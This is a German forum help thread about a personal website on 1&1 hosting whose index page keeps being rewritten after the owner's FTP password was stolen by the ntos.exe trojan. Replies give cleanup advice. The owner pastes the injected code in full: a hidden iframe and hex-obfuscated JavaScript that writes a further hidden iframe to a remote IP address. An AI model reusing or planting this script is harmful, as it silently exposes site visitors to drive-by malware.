Hallo...ich bräuchte dringend profesionelle Hilfe...

Meine erste hp mit DW CS3 erstellt wurde vor 1 Woche auf meinen 1&1 Webspace geladen. Nachdem sich 2 Personen einen Trojaner eingefangen und getilgt haben, überprüfte ich meinen PC mit Antivir. Dieser hat 8 Trojaner entdeckt und gelöscht. Meine Seite wurde natürlich sofort vom Space genommen. Nachdem mein eigenes System gesäubert war, habe ich die Dateien mit FTP DW wieder auf den Space geladen. Alles gut, keine Warnung. Auch Freunde haben keine Warnung mehr bekommen. Dann war ich grad bei einem Freund bei dem Antivir beim öffnen meiner Seite wieder ausgeflippt ist. Trojaner hier und da. Der 1&1 Support sagt es wäre alles sauber auf meiner HP. Da ich nun etwas verwirrt bin, möchte ich euch bitten einmal meine HP zu prüfen...wer sich trautDie Adresse gibt es als PM...Danke

PS: Bis auf "lightbox" wurden keine externen Skripte oder Werbung eingebunden

Edit:
Also...ich habe grad bei 1&1 erneut angerufen und die haben keine Viruswarnung bekommen. Die Seite sollte also sauber sein laut 1&1 techniker. Wieso nur hat mein Freund diese Warnungen bekommen als er meine Seite aufgerufen hat?

Hi,

kannst mir ja mal die Adresse PNen, Sonntag werde ich aber nicht sehr viel Online sein, ich schau aber ma rein, könnte aber Montag werden. Trifft sich auch gut, ich habe hier ein Antivir am laufen.

Gruß, Karl

zunächst mal danke an karl...er hat den plagegeist bereits aufgefunden...nun zu meinem problem...meine index wird immer wieder auf dem space bei 1&1 umgeschrieben...folgender eintrag fügt sich serverseitig dem body automatisch hinzu und kann nicht gelöscht werden:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47d466a20a2a6(v47d466a20aa1a){ function v47d466a20b222 () {return 16;} return(parseInt(v47d466a20aa1a,v47d466a20b222()));}function v47d466a20c213(v47d466a20ca0e){ function v47d466a20e1f6 () {return 2;} var v47d466a20d205='';for(v47d466a20d9fc=0; v47d466a20d9fc<v47d466a20ca0e.length; v47d466a20d9fc+=v47d466a20e1f6()){ v47d466a20d205+=(String.fromCharCode(v47d466a20a2a6(v47d466a20ca0e.substr(v47d466a20d9fc, v47d466a20e1f6()))));}return v47d466a20d205;} document.write(v47d466a20c213('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D383 633393033333130666431207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6 D28292A313238333830292B27375C272077696474683D353234206865696768743D323435207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5 343524950543E'));</script>

Ich habe die index neu erstellt und ohne diesen unsichtbaren iframe auf den space geladen...verbindung über ftp geschlossen...für 1h alles ok und sauber...und nach dieser einen stunde sehe ich, daß sich die index auf dem space wieder verändert hat. selbes skript...kann es sein, daß sich da noch unsichtbar etwas auf dem 1&1 space befindet und meine index umschreibt? ich bin schon etwas verzweifelt, zumal der 1&1 support das problem nicht einmal findet.

Hilfe!!!

ich vermute einen zusammenhang mit der bösen ntos.exe die mir spybot immer angezeigt hat aber nicht löschen konnte. mit sdfix die ntox.exe und seine freunde gelöschen. antivir und spybot lasse ich grad über das system laufen. mal sehen ob nun alles sauber ist. dann das ftp pw ändern. vermutlich werde ich nicht drum herum kommen meinen pc neu aufzusetzen. klasse wie hartneckig solche viren und trojaner sein können. möchte mal wissen wer so etwas schreibt.

Ok, dann haben wir zumindestens einen Weg, über den das passieren kann. Eine der Spzialitäten von ntos.exe ist das abgreifen von Passwörtern. Damit ist der Weg auf deinen Webspace natürlich offen. Also kannst Du dir erstmal das Wühlen in ewig langen Serverlogs wohl sparen. Benachrichtige deinen Provider, dass er die Seite erstmal offline stellt, damit sie nicht andere Systeme infizieren kann. Dann formaitier die Platte und setz dein System auf. Danach brauchst Du ein neues FTP-Passwort, erst danach, sonst wäre es sofort wieder verraten. Nun kannst Du deinen Webspace in Ordnung bringen und die Seite wieder online stellen. Dann mal sehen, ob sie wieder verändert wird. Sollte es passieren, dann mal die Serverlogs vornehmen.

So...Danke für die Hilfe...ich konnte mein System säubern (ntos.exe war wohl der Haupttäter) mit SDFIX, und nachdem ich mein FTP PW für den Space mit meinem sauberen System geändert und die Seite neu hochgeladen habe wurde ich auch in Ruhe gelassen. Mal sehen wie lange